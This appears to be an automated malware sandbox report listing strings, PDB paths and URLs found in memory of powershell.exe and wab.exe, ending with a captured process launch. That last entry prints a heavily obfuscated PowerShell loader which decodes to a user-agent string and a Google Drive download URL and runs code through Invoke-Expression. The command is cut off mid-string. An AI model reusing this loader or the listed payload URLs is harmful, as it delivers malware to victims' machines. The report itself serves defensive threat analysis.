Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2411714026.0000000002F7F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb.ene source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdbeW: source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp |
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C58A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.sectigo.com0 |
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://smtp.privateemail.com |
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/5m |
Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/mmH |
Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 |
Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57- |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWP |
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWXRll |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: wab.exe, 00000008.00000002.3277379903.000000000056A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/ |
Source: wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download |
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C4BCD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://sectigo.com/CPS0 |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSa |